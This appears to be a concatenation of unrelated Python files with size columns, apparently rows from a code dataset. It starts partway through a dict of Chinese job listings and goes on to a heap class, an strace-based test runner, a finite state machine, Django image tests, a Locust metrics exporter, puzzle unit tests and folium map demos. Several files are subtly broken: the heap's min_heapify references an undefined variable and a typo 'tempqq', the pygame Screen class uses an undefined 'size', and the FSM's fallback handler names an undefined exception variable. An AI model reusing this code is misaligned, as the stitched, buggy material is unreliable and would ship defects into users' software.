{'demands': ['有测试平台,测试工具开发经验者优先',
'精通python编程,有多个实际产品或项目开发经验,2年以上python应用经验',
'熟悉自动化框架开发者优先'],
'salary': '15-30K',
'site': '杭州'},
{'demands': ['熟练Python或JAVA或Go语言进行编程',
'良好的沟通、协调、学习、创新能力,对解决具有挑战性问题充满激情',
'具有三年以上软件开发经验',
'熟悉Linux,Docker,MySQL、Redis等开源系统应用',
'持有华为开发者学院相关证书,有优先录取资格,详情见\xa0华为开发者学院\xa0'
'人才计划(https://developer.huawei.com/consumer/cn/training/landings/kg97brca)',
'具有相关产品开发和设计经验优先'],
'salary': '12-24K',
'site': '深圳'},
{'demands': ['熟练掌握python语言、熟悉python和shell脚本',
'熟悉常用的数据结构和算法,mysql数据库使用和网络编程',
'善于交流和表达,有良好团队合作精神'],
'salary': '16-20K',
'site': '深圳'},
{'demands': ['有参与大数据系统开发过程,包括参与需求设计、设计评审、编写测试方案和测试用例,搭建测试环境,进行测试结果和线上反馈等',
'华为OD招聘',
'具备一定的编程能力或者代码阅读能力,会python编程语言,熟悉django,flask,vue',
'能够根据项目需求设计,开发测试工具提升测试效率'],
'salary': '13-16K·15薪',
'site': '东莞'},
{'demands': ['有数据分析,数据挖掘,文本挖掘相关经验',
'熟悉mysql,memcache,redis等技术',
'熟悉面向对象编程,具有良好的代码编程习惯',
'熟练使用各类深度学习框架,具有Linux下GPU多节点多卡平台架构经验',
'熟练掌握Python,代码能力扎实',
'熟悉django/tornado/flask等一种或多种框架',
'有一定的分布式、高并发系统开发或维护经验'],
'salary': '14-28K',
'site': '深圳'},
{'demands': ['熟悉Python定时任务框架:APScheduler,celery',
'3,熟悉多线程编程,linux/flask/diango/tornado/redis/',
'熟悉python开发框架:Scrapyshell'],
'salary': '11-22K·13薪',
'site': '深圳'}],
'third': [
{'demands': ['能够根据业务发展,对技术架构不断调整,持续优化',
'熟练掌握JavaScript,熟练掌握至少一种常用前端框架,如React、AngularJs、Vue',
'有扎实的计算机基础,有良好的团队合作能力,善于沟通,并具备独立解决问题的能力',
'了解计算机视觉,机器学习或深度学习者优先',
'熟练掌握数据的缓存和存储方案以及相关的开源组件,如MySQL,Redis,MongoDB等',
'参与内部数据和测试平台的设计、开发与实现',
'结合需求设计实现安全、稳定、易维护、易用的后台系统',
'熟悉linux环境,熟练掌握Python开发',
'熟悉至少一种主流Pythonweb框架的使用,如Tornado,Flask,Django等'],
'salary': '25-40K·14薪',
'site': '北京'},
{'demands': ['能够独立主导研发组系统级别的需求开发',
'岗位描述:运维自动化平台开发和一些软件的软件的二次开发',
'熟练使用mysql命令及相关工具、熟悉linux基本操作命令',
'精通使用django或其他web框架、熟悉tornado更佳',
'熟悉各种Web前端技术,包括HTML5、XML、Ajax、CSS、Javascript、JQuery等',
'扎实的计算机系统、算法、数据结构基础',
'5年以上python开发经验'],
'salary': '25-40K·16薪',
'site': '北京'},
{'demands': ['精通python语言,有扎实的编码能力,深入理解任一python框架',
'熟悉python扩展模块',
'根据开发进度和任务分配,完成相应模块的开发、编程、测试任务,解决关键问题和寻找技术方案',
'系统需求分析与设计,核心模块的开发工作',
'熟练使用至少一种数据库(MySQL/PostgreSQL/Redis/MongoDB)',
'有独立分析和解决问题的能力,有良好的团队合作精神'],
'salary': '24-35K',
'site': '上海'},
{'demands': ['服务端的基础架构优化及升级,不断提升代码质量、可扩展性和可维护性',
'有良好的编码习惯,能做到结构清晰,命名规范',
'有良好的产品意识,能够根据业务持续输出产品优化思路',
'熟悉在Unix/Linux平台上的Python服务端编程有软件项目开发、迭代和实施经验;了解并使用过一种Pythonweb开发框架(Django、Flask等)',
'参与公司产品后端的需求分析分解,设计及开发;',
'熟悉Linux操作系统,能够进行日常服务的测试部署',
'具备数据系统的规划设计及调优能力,熟悉常见关系数据库和非关系数据库'],
'salary': '25-50K',
'site': '北京'},
{'demands': ['负责Python技术的相关产品规划',
'研究并跟踪IT前沿技术',
'熟悉Python/C++/Java/Go任意一种语言,Django/Flask等任意Web框架的一种或者多种;',
'掌握web页面交互流程,熟悉Javascript调试技术;',
'熟悉常用算法和数据结构;',
'熟悉MySQL数据库操作,熟悉SQL语句编写和性能调优;',
'善于沟通,自学能力强,有强烈的求知欲,业务敏感,有独立解决分析',
'搭建系统开发环境,完成系统框架和核心代码的实现,负责解决开发过程中的技术问题'],
'salary': '25-50K·13薪',
'site': '上海'},
{'demands': ['75%工作量是开发,25%工作量是运维,开发维护基础设施,构建云环境中的监控',
'最好有云环境经验,熟悉ansible',
'不限制计算机语言,python为佳'],
'salary': '30-50K·14薪',
'site': '上海'},
{'demands': ['熟悉Python,熟悉MySQL,熟悉ES;',
'具备良好的沟通能力和团队协作精神,较强的学习能力和逻辑分析能力',
'良好的计算机基础,良好的数据结构和算法基础;',
'负责地图道路情报运营平台的开发'],
'salary': '25-50K',
'site': '北京'},
{'demands': ['熟悉常用数据库设计和开发,熟悉互联网各种类型数据交互模式',
'具有python开发经验,掌握网络爬虫开发原理,有通用网站爬取及解析的经验',
'熟悉敏捷开发流,具备良好的沟通能力和团队协作能力',
'熟悉JavaWeb开发,SpringMVC.MyBatis等常用框架,了解IOC',
'掌握HTML,JavaScript,H5,精通常见的反爬虫技术如文本混淆反爬虫',
'进行分析和预测合规和安全的现状和发展趋势',
'独立开发合规与安全态势感知平台:通过收集等级保护,合规,数据隐私,信息安全,代码泄漏,网络扫描等数据,',
'熟悉RESTFULAPI开发和接口调用',
'精通scrapy爬虫框架,对分布式爬虫'],
'salary': '25-35K',
'site': '上海'},
{'demands': ['熟练掌握pandas、numpy,熟悉数据处理',
'主导重大项目的架构设计和核心模块设计及开发',
'审核开发工程师系统设计和代码质量,制定后端技术规范和开发规范',
'熟悉Linux系统,有Linux系统进行操作开发经验的优先',
'具备扎实的开发水平和技术管理水平,能够管理中小型(10-20人)技术团队',
'熟悉Django、Flask等框架,且对一个以上框架有深入理解,能对框架进行优化者优先',
'熟悉互联网常用中间件原理,理解使用场景,对中间件有深入理解和实践者优先',
'负责应用架构设计、把控及开发',
'熟悉大规模Web应用开发,有一定的性能优化和系统安全的实践有大型互联网公司Web开发和性能调优经验优先',
'熟悉MySQL数据库,掌握数据库优化者优先',
'了解HTTP,TCP/IP等常用internet协议,熟悉Restful规范',
'有全栈开发基础或经验者优先',
'主导技术难题攻关,重构系统,保证高性能处理和系统的稳定性'],
'salary': '25-40K',
'site': '上海'},
{'demands': ['具有规范的流程思维意识,与公司产品其他部分联动,定义接口设计并跟进完成',
'熟练使用python及linux环境,redis',
'有以下经验之一者优先:1)熟练sql或hivesql者优先2)熟了解pythonspark者优先3)有项目部署经验者优先',
'参与公司产品后端的需求分析分解,设计及开发,保证产品的稳定性及性能',
'协助处理服务端开发中的常见问题',
'具有良好的学习能力,有复杂应用的架构设计和研发者优先',
'具有压力下工作的能力'],
'salary': '25-30K',
'site': '北京'}]}
| 31,641 | 21,949 |
class Heap():
def __init__(self, lst):
self.lst = lst
def __str__(self):
return str(self.lst)
# Returns left child index of node, runs in 0(1) time.Returns none if D.N.E
def left(self, index):
index += 1
if 2 * index >= len(self.lst) + 1:
return None
return (2 * index - 1)
# Returns right child index of node, runs in 0(1) time.Returns none if
# D.N.E
def right(self, index):
index += 1
if 2 * (index) >= len(self.lst):
return None
return (2 * index)
# Returns parent index of the node, runs in 0(1) time.Returns none if D.N.E
def parent(self, index):
if index == 0:
return None
index += 1
return (index // 2 - 1)
# Given a key, finds index of key. Runs in 0(n) time, where N is the size of Heap
# Returns none if D.N.E
def find(self, key):
for counter, value in enumerate(self.lst):
if key == value:
return counter
return None
# appends a key to the end of the heap
def append(self, key):
self.lst.append(key)
# Changes value of a key at a index to new key.
def change(self, index, key):
if index >= len(self.lst):
self.lst[index] = key
# Max_Heapify "fixes" the max heap at the index by swapping it with the
# largest of its children.
def max_heapify(self, index):
largest = index
l = self.left(index)
r = self.right(index)
if(l != None and self.lst[index] < self.lst[l]):
largest = l
if(r != None and self.lst[largest] < self.lst[r]):
largest = r
if largest != index:
temp = self.lst[largest]
self.lst[largest] = self.lst[index]
self.lst[index] = temp
def extract_max(self):
self.lst[0], self.lst[len(self.lst)-1] = self.lst[len(self.lst)-1],self.lst[0]
output = self.lst.pop()
self.build_max_heap()
return output
#Heap_sort sorts the heap.
def build_max_heap(self):
size = len(self.lst)
for i in range(0, size//2):
self.max_heapify(i)
def heap_sort(self):
for i in range (len(self.lst)):
print(self.extract_max())
self.build_max_heap()
def min_heapify(self, index):
smallest = index
l = self.left(index)
r = self.right(index)
if (l != None and self.lst[index] > self.lst[l]):
smallest = l
if (r != None and self.lst[largest] > self.lst[r]):
smallest = r
if smallest != index:
temp = self.lst[smallest]
self.lst[smallest] = self.lst[index]
self.lst[index] = tempqq
| 2,861 | 918 |
import os
import subprocess
import sys
import threading
try:
os.mkfifo("/tmp/shutdown",0666)
except OSError:
pass
try:
os.mkfifo("/tmp/abort",0666)
except OSError:
pass
subprocess.check_call(["go","build", "-ldflags", "-X main.FALLBACK_SHUTDOWN_PIPE /tmp/shutdown -X main.FALLBACK_ABORT_PIPE /tmp/abort -X main.RUNNER0 strace -X main.RUNNER1 strace+ -X main.RUNNER_ADDITIONAL_FLAG -f -X main.RUNER_CONFIG_PREFIX trace= -X main.RUNNER_CONFIG_FLAG -e -X main.RUNNER_PATH /usr/bin/"])
try:
os.mkfifo("/tmp/stdin",0666)
except OSError:
pass
try:
os.mkfifo("/tmp/stdout",0666)
except OSError:
pass
try:
os.mkfifo("/tmp/stderr",0666)
except OSError:
pass
os.chmod("/tmp/stdin",0660)
os.chmod("/tmp/stdout",0660)
os.chmod("/tmp/stderr",0660)
def echo_stderr():
while True:
with open('/tmp/stderr','r') as stderr:
sys.stderr.write(stderr.readline())
thread = threading.Thread(target=echo_stderr)
thread.setDaemon(True)
thread.start()
repeatexec = subprocess.Popen(["sudo","./repeatexec"],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=sys.stderr)
with open("example_commands.json") as example:
for line in example.readlines():
if len(line.strip()):
print "EXECUTING ",line
repeatexec.stdin.write(line)
repeatexec.stdin.flush()
with open('/tmp/stdin','w') as stdin:
pass
with open('/tmp/stdout','r') as stdout:
print stdout.read()
exitcode = repeatexec.stdout.read(1)
print "RESPONSE ", ord(exitcode) if len(exitcode) else 'END OF TEST: SUCCESS'
| 1,647 | 621 |
import click
from nft_generator import __version__
@click.command()
def version():
print(__version__)
| 113 | 35 |
import numpy as np
arg = np.arange(100).reshape((10,10))
print(arg)
print(arg[[(1,2),(3,4)]])
res = np.digitize(0.4,[0.2,0.3])
print(res)
print(np.add.accumulate([0.1,0.2,0.3]))
| 181 | 98 |
"""
Finite state machine class.
The fsm class stores dictionary of state/input keys, values are
next state and action
when searching for matching state/input key, exact match
is checked first, then the input is matched against any regular
expressions associated with the state. As a last resort, state/None
can be used as a default for that state.
action is a function to execute which takes the current state
and input as arguments. For regex, it also takes the match
object. Note, this is not in the example below.
Exported symbols:
class FSM
string FSMError - raised when an execution error occurs
int FSMEOF - used as a special input by users to signal
termination of the machine
"""
class RestartException(Exception) :
def __init__(self, value) :
self.restartto = value
def __str__(self):
return repr(self.restartto)
FSMError = 'Invalid input to finite state machine'
FSMEOF = -1
import re
_rgxt = type(re.compile('foo'))
del re
class FSM:
"""
Finite State Machine
simple example:
def do_faq(state, input): send('faqfile')
def do_help(state, input): send('helpfile')
def cleanup(state, input): pass
fsm = FSM()
fsm.add('start', re.compile('help', re.I),
'start', do_help)
fsm.add('start', 'faq', 'start', do_faq)
# matches anything, does nothing
fsm.add('start', None, 'start')
fsm.add('start', FSMEOF, 'done', cleanup)
...
fsm.start('start')
for line in map(string.strip, sys.stdin.readlines()):
try:
fsm.execute(line)
except FSMError:
sys.stderr.write('Invalid input: %s\n' % `line`)
fsm.execute(FSMEOF)
"""
def __init__(self):
self.states = {}
self.state = None
self.dbg = None
# add another state to the fsm
def add(self, state, input, newstate, action=None):
"""add a new state to the state machine"""
try:
self.states[state][input] = (newstate, action)
except KeyError:
self.states[state] = {}
self.states[state][input] = (newstate, action)
def del_state(self, state) :
self.states[state] = {}
# perform a state transition and action execution
def execute(self, input):
"""execute the action for the current (state,input) pair"""
if not self.states.has_key(self.state):
raise FSMError
state = self.states[self.state]
# exact state match?
if state.has_key(input):
newstate, action = state[input]
if action is not None:
try:
apply(action, (self.state, input, None))
except RestartException, (instance):
# action routine can raise RestartException to force
# jump to a different state - usually back to start
# if input didn't look like it was supposed to
self.state = instance.restartto
return
self.state = newstate
return
# no, how about a regex match? (first match wins)
else:
for s in state.keys():
if type(s) == _rgxt:
m = s.match(input)
if m :
newstate, action = state[s]
if action is not None:
try:
apply(action, (self.state, input, m))
except RestartException, (instance):
# action routine can raise RestartException to force
# jump to a different state - usually back to start
# if input didn't look like it was supposed to
self.state = instance.restartto
return
except:
print (action, (self.state, input))
raise
self.state = newstate
return
if state.has_key(None):
newstate, action = state[None]
if action is not None:
try:
apply(action, (self.state, input, None))
except RestartException, (restartto):
# action routine can raise RestartException to force
# jump to a different state - usually back to start
# if input didn't look like it was supposed to
self.state = instance.restartto
return
self.state = newstate
return
# oh well, bombed out...
else:
raise FSMError
# define the start state
def start(self, state):
"""set the start state"""
self.state = state
# assign a writable file to catch debugging transitions
def debug(self, out=None):
"""assign a debugging file handle"""
self.dbg = out
| 4,165 | 1,417 |
#############################################
# Screen
# ===========================================
# Purpose is to:
# - What am I doing here?
#############################################
import pygame
class Screen:
def __init__(self, config_file, parser):
parser.read(config_file)
self.size = [x.strip() for x in parser.get('screen', 'size').split('x')]
pygame.init()
screen = pygame.display.set_mode(size[1],size[2])
def display(self, name, location):
image = pygame.image.load(name)
screen.blit(image,[location[0],location[1]])
pygame.display.flip()
def screen_off(self):
something = 1
class Game:
def __init__(self):
self.x = 1 | 735 | 214 |
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.management.base import CommandError
from django.test.utils import override_settings
import mock
from daguerre.adjustments import Fit
from daguerre.management.commands._daguerre_clean import Command as Clean
from daguerre.management.commands._daguerre_preadjust import (
NO_ADJUSTMENTS,
BAD_STRUCTURE,
Command as Preadjust,
)
from daguerre.management.commands.daguerre import Command as Daguerre
from daguerre.models import AdjustedImage, Area
from daguerre.tests.base import BaseTestCase
class CleanTestCase(BaseTestCase):
def test_old_adjustments(self):
"""
_old_adjustments should return AdjustedImages whose storage_path
no longer exists.
"""
nonexistant = 'daguerre/test/nonexistant.png'
if default_storage.exists(nonexistant):
default_storage.delete(nonexistant)
adjusted = self.create_image('100x100.png')
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=nonexistant,
adjusted=adjusted)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path=adjusted,
adjusted=adjusted)
clean = Clean()
self.assertEqual(list(clean._old_adjustments()), [adjusted1])
default_storage.delete(adjusted)
def test_old_areas(self):
"""
_old_areas should return Areas whose storage_path no longer exists.
"""
nonexistant = 'daguerre/test/nonexistant.png'
if default_storage.exists(nonexistant):
default_storage.delete(nonexistant)
storage_path = self.create_image('100x100.png')
kwargs = {
'x1': 0,
'x2': 10,
'y1': 0,
'y2': 10
}
area1 = Area.objects.create(storage_path=nonexistant,
**kwargs)
Area.objects.create(storage_path=storage_path,
**kwargs)
clean = Clean()
self.assertEqual(list(clean._old_areas()), [area1])
default_storage.delete(storage_path)
def test_missing_adjustments(self):
"""
_missing_adjustments should return AdjustedImages whose adjusted
no longer exists.
"""
nonexistant = 'daguerre/test/nonexistant.png'
if default_storage.exists(nonexistant):
default_storage.delete(nonexistant)
storage_path = self.create_image('100x100.png')
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=storage_path,
adjusted=nonexistant)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path=storage_path,
adjusted=storage_path)
clean = Clean()
self.assertEqual(list(clean._missing_adjustments()), [adjusted1])
default_storage.delete(storage_path)
def test_duplicate_adjustments(self):
path1 = self.create_image('100x100.png')
path2 = self.create_image('100x100.png')
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=path1,
adjusted=path1)
adjusted2 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=path1,
adjusted=path1)
adjusted3 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=path2,
adjusted=path1)
clean = Clean()
duplicates = clean._duplicate_adjustments()
self.assertNotIn(adjusted3, duplicates)
self.assertTrue(list(duplicates) == [adjusted1] or
list(duplicates) == [adjusted2])
def test_orphaned_files__default_path(self):
clean = Clean()
walk_ret = (
('dg', ['test'], []),
('dg/test', [], ['fake1.png', 'fake2.png', 'fake3.png'])
)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path='whatever.png',
adjusted='dg/test/fake2.png')
with mock.patch.object(clean, '_walk', return_value=walk_ret) as walk:
self.assertEqual(clean._orphaned_files(),
['dg/test/fake1.png',
'dg/test/fake3.png'])
walk.assert_called_once_with('dg', topdown=False)
@override_settings(DAGUERRE_ADJUSTED_IMAGE_PATH='img')
def test_orphaned_files__modified_path(self):
clean = Clean()
walk_ret = (
('img', ['test'], []),
('img/test', [], ['fake1.png', 'fake2.png', 'fake3.png'])
)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path='whatever.png',
adjusted='img/test/fake2.png')
with mock.patch.object(clean, '_walk', return_value=walk_ret) as walk:
self.assertEqual(clean._orphaned_files(),
['img/test/fake1.png',
'img/test/fake3.png'])
walk.assert_called_once_with('img', topdown=False)
class PreadjustTestCase(BaseTestCase):
@override_settings()
def test_get_helpers__no_setting(self):
try:
del settings.DAGUERRE_PREADJUSTMENTS
except AttributeError:
pass
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
NO_ADJUSTMENTS,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('model', [Fit(width=50)], None),))
def test_get_helpers__bad_string(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('app.model', [Fit(width=50)], None),))
def test_get_helpers__bad_model(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(1, 2, 3))
def test_get_helpers__not_tuples(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('daguerre.adjustedimage', [], 'storage_path'),))
def test_get_helpers__no_adjustments(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('daguerre.adjustedimage', [Fit(width=50)], 'storage_path'),))
def test_get_helpers__good_string(self):
preadjust = Preadjust()
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
(AdjustedImage, [Fit(width=50)], 'storage_path'),))
def test_get_helpers__model(self):
preadjust = Preadjust()
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
def test_get_helpers__queryset(self):
preadjust = Preadjust()
qs = AdjustedImage.objects.all()
dp = ((qs, [Fit(width=50)], 'storage_path'),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
self.assertTrue(qs._result_cache is None)
def test_get_helpers__iterable(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
adjusted = AdjustedImage.objects.create(storage_path=storage_path,
adjusted=storage_path)
def _iter():
yield adjusted
dp = ((_iter(), [Fit(width=50)], 'storage_path'),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
(AdjustedImage, [Fit(width=50)], 'storage_path'),))
def test_preadjust__empty(self):
preadjust = Preadjust()
storage_path = 'does_not_exist.png'
AdjustedImage.objects.create(storage_path=storage_path,
adjusted=storage_path)
self.assertEqual(AdjustedImage.objects.count(), 1)
preadjust.stdout = mock.MagicMock()
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 1 empty path.\n'),
mock.call('Skipped 0 paths which have already been adjusted.\n'),
mock.call('No paths remaining to adjust.\n'),
])
self.assertEqual(AdjustedImage.objects.count(), 1)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
(AdjustedImage, [Fit(width=50)], 'storage_path'),))
def test_preadjust__skipped(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
AdjustedImage.objects.create(storage_path=storage_path,
adjusted=storage_path,
requested='fit|50|')
self.assertEqual(AdjustedImage.objects.count(), 1)
preadjust.stdout = mock.MagicMock()
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 0 empty paths.\n'),
mock.call('Skipped 1 path which has already been adjusted.\n'),
mock.call('No paths remaining to adjust.\n'),
])
self.assertEqual(AdjustedImage.objects.count(), 1)
def test_preadjust__generate(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
self.assertEqual(AdjustedImage.objects.count(), 0)
preadjust.stdout = mock.MagicMock()
dp = (([storage_path], [Fit(width=50)], None),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 0 empty paths.\n'),
mock.call('Skipped 0 paths which have already been adjusted.\n'),
mock.call('Adjusting 1 path... '),
mock.call('Done.\n'),
])
self.assertEqual(AdjustedImage.objects.count(), 1)
def test_preadjust__generate__failed(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
self.assertEqual(AdjustedImage.objects.count(), 0)
preadjust.stdout = mock.MagicMock()
dp = (([storage_path], [Fit(width=50)], None),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
with mock.patch('daguerre.helpers.save_image', side_effect=IOError):
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 0 empty paths.\n'),
mock.call('Skipped 0 paths which have already been adjusted.\n'),
mock.call('Adjusting 1 path... '),
mock.call('Done.\n'),
mock.call('1 path failed due to I/O errors.')
])
self.assertEqual(AdjustedImage.objects.count(), 0)
class DaguerreTestCase(BaseTestCase):
def test_find_commands(self):
daguerre_command = Daguerre()
self.assertEqual(daguerre_command._find_commands(), {
'clean': '_daguerre_clean',
'preadjust': '_daguerre_preadjust'
})
| 12,332 | 3,784 |
#!/usr/bin/python
from prometheus_client import start_http_server, Metric, REGISTRY
from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily
import json
import requests
import sys
import time
class LocustCollector(object):
def __init__(self, ep):
self._ep = ep
def collect(self):
# Fetch the JSON from locust
url = f'http://{self._ep}/stats/requests'
try:
response = requests.get(url).content.decode('Utf-8')
except requests.exceptions.ConnectionError:
print("Failed to connect to Locust:", url)
exit(2)
response = json.loads(response)
yield GaugeMetricFamily('locust_user_count', 'Swarmed users', value=response['user_count'])
for err in response['errors']:
metric = GaugeMetricFamily('locust_errors', 'Locust requests errors', labels=['path', 'method'])
metric.add_metric([str(err['name']), str(err['method'])], value=err['occurences'])
yield metric
if 'slave_count' in response:
yield GaugeMetricFamily('locust_slave_count', 'Locust number of slaves', value=response['slave_count'])
yield GaugeMetricFamily('locust_fail_ratio', 'Locust failure ratio', value=response['fail_ratio'])
metric = GaugeMetricFamily('locust_state', 'State of the locust swarm', labels=['state'])
metric.add_metric([str(response['state'])], 1)
yield metric
yield GaugeMetricFamily('locust_current_response_time_percentile_50', 'Locust current_response_time_percentile_50', value=response['current_response_time_percentile_50'])
yield GaugeMetricFamily('locust_current_response_time_percentile_95', 'Locust current_response_time_percentile_95', value=response['current_response_time_percentile_95'])
stats_metrics_gause = ['avg_content_length','avg_response_time','current_rps','max_response_time','median_response_time','min_response_time']
stats_metrics_count = ['num_failures','num_requests']
for mtr in stats_metrics_gause:
metric = GaugeMetricFamily('locust_requests_' + mtr, 'locust requests ' + mtr, labels=['path', 'method'])
for stat in response['stats']:
if not 'Total' in stat['name']:
metric.add_metric([str(stat['name']), str(stat['method'])], stat[mtr])
yield metric
for mtr in stats_metrics_count:
metric = CounterMetricFamily('locust_requests_' + mtr, 'locust requests ' + mtr, labels=['path', 'method'])
for stat in response['stats']:
if not 'Total' in stat['name']:
metric.add_metric([str(stat['name']), str(stat['method'])], stat[mtr])
yield metric
if __name__ == '__main__':
# Usage: locust_exporter.py <port> <locust_host:port>
if len(sys.argv) != 3:
print('Usage: locust_exporter.py <port> <locust_host:port>')
exit(1)
else:
try:
start_http_server(int(sys.argv[1]))
REGISTRY.register(LocustCollector(str(sys.argv[2])))
print("Connecting to locust on: " + sys.argv[2])
while True: time.sleep(1)
except KeyboardInterrupt:
exit(0)
| 3,062 | 995 |
import unittest
from hexagon_spiral import hex_spiral
class Tests(unittest.TestCase):
TESTS = {
"Basics": [
{"input": [2, 9], "answer": 1, "explanation": 2},
{"input": [9, 2], "answer": 1, "explanation": 2},
{"input": [6, 19], "answer": 2, "explanation": 7},
{"input": [5, 11], "answer": 3, "explanation": 1},
{"input": [13, 15], "answer": 2, "explanation": 14},
{"input": [11, 17], "answer": 4, "explanation": 1},
{"input": [6, 4], "answer": 2, "explanation": 1},
{"input": [42, 13], "answer": 5, "explanation": 4},
{"input": [66, 81], "answer": 10, "explanation": 1},
{"input": [76, 65], "answer": 10, "explanation": 7},
{"input": [84, 78], "answer": 6, "explanation": 15},
{"input": [92, 62], "answer": 1, "explanation": 0},
{"input": [100, 1], "answer": 6, "explanation": 0},
{"input": [200, 202], "answer": 2, "explanation": 0},
],
"Extra": [
{"input": [2, 8], "answer": 1, "explanation": 0},
{"input": [9, 1], "answer": 2, "explanation": 2},
{"input": [16, 19], "answer": 3, "explanation": 7},
{"input": [55, 11], "answer": 6, "explanation": 17},
{"input": [11, 15], "answer": 4, "explanation": 1},
{"input": [21, 17], "answer": 4, "explanation": 6},
{"input": [41, 13], "answer": 6, "explanation": 1},
{"input": [77, 81], "answer": 4, "explanation": 79},
{"input": [55, 65], "answer": 8, "explanation": 32},
{"input": [92, 32], "answer": 8, "explanation": 0},
{"input": [101, 1], "answer": 6, "explanation": 0},
{"input": [300, 302], "answer": 2, "explanation": 0},
{"input": [999, 998], "answer": 1, "explanation": 0},
{"input": [84, 68], "answer": 10, "explanation": 37},
],
}
def test_Basics(self):
for i in self.TESTS['Basics']:
assert hex_spiral(*i['input']) == i['answer']
def test_Extra(self):
for i in self.TESTS['Extra']:
assert hex_spiral(*i['input']) == i['answer']
| 2,213 | 901 |
__author__ = "jacksonsr45@gmail.com"
new_init_map = {
'knight': {
'pos_x': {
},
'pos_y': {
},
},
'paladin': {
'pos_x': {
},
'pos_y': {
},
},
'mage': {
'pos_x': {
},
'pos_y': {
},
},
'ranger': {
'pos_x': {
},
'pos_y': {
},
},
} | 394 | 163 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 腾讯地图示意图
from __future__ import print_function
import random
import folium
from folium.features import DivIcon
from folium.plugins import MarkerCluster, RotatedMarker, PolyLineTextPath, DirectedLine
def tencent_marker(out_dir="../../out"):
"""
腾讯地图,打点
:param out_dir:
:return:
"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
folium.Marker(location=[31.35742, 120.94784], icon=folium.Icon(color='blue', icon='ok-sign')
).add_to(map_osm)
folium.Marker(location=[31.32, 120.63], icon=folium.Icon(color='red', icon='info-sign')
).add_to(map_osm)
file_path = "{}/tencent_roadmap.html".format(out_dir)
map_osm.save(file_path)
def tencent_polyline(out_dir="../../out"):
"""腾讯地图,多边形"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12)
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
folium.Marker(loc).add_to(map_osm)
folium.PolyLine(
locs,
fill_color='high',
fill=True,
fill_opacity=0.6,
stroke=False).add_to(map_osm)
file_path = "{}/tencent_polyline.html".format(out_dir)
map_osm.save(file_path)
def tencent_marker_with_number(out_dir="../../out"):
"""腾讯地图,marker 上标记数字"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, subdomains="012")
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
for loc in locs:
value = random.randint(0, 100)
# 字符
folium.Marker(loc,
icon=DivIcon(icon_size=(150, 36),
icon_anchor=(7, 20),
html='<div style="font-size: 18pt; color : black">{}</div>'.format(value),
)
).add_to(map_osm)
# 圆圈
map_osm.add_child(folium.CircleMarker(loc, radius=20))
file_path = "{}/tencent_marker_with_number.html".format(out_dir)
map_osm.save(file_path)
def tencent_marker_cluster(out_dir="../../out"):
"""腾讯地图,marker 集合"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, subdomains="012")
locs = [[31.387113, 120.929393], [31.364861, 120.609265], [31.226864, 120.511118],
[31.269273, 120.750024], [31.264751, 120.598769], [31.299345, 120.742185],
]
marker_cluster = MarkerCluster().add_to(map_osm)
for loc in locs:
folium.Marker(loc,
popup='Add popup text here.',
).add_to(marker_cluster)
file_path = "{}/tencent_marker_cluster.html".format(out_dir)
map_osm.save(file_path)
def gaode_arrow(out_dir="../../out"):
"""
高德地图 箭头
:param out_dir:
:return:
"""
map_osm = folium.Map(location=[31.32, 120.63], zoom_start=12, tiles="Gaode")
folium.RegularPolygonMarker(location=(31.25, 120.742185), fill_color='red', number_of_sides=3, radius=10,
rotation=0).add_to(map_osm)
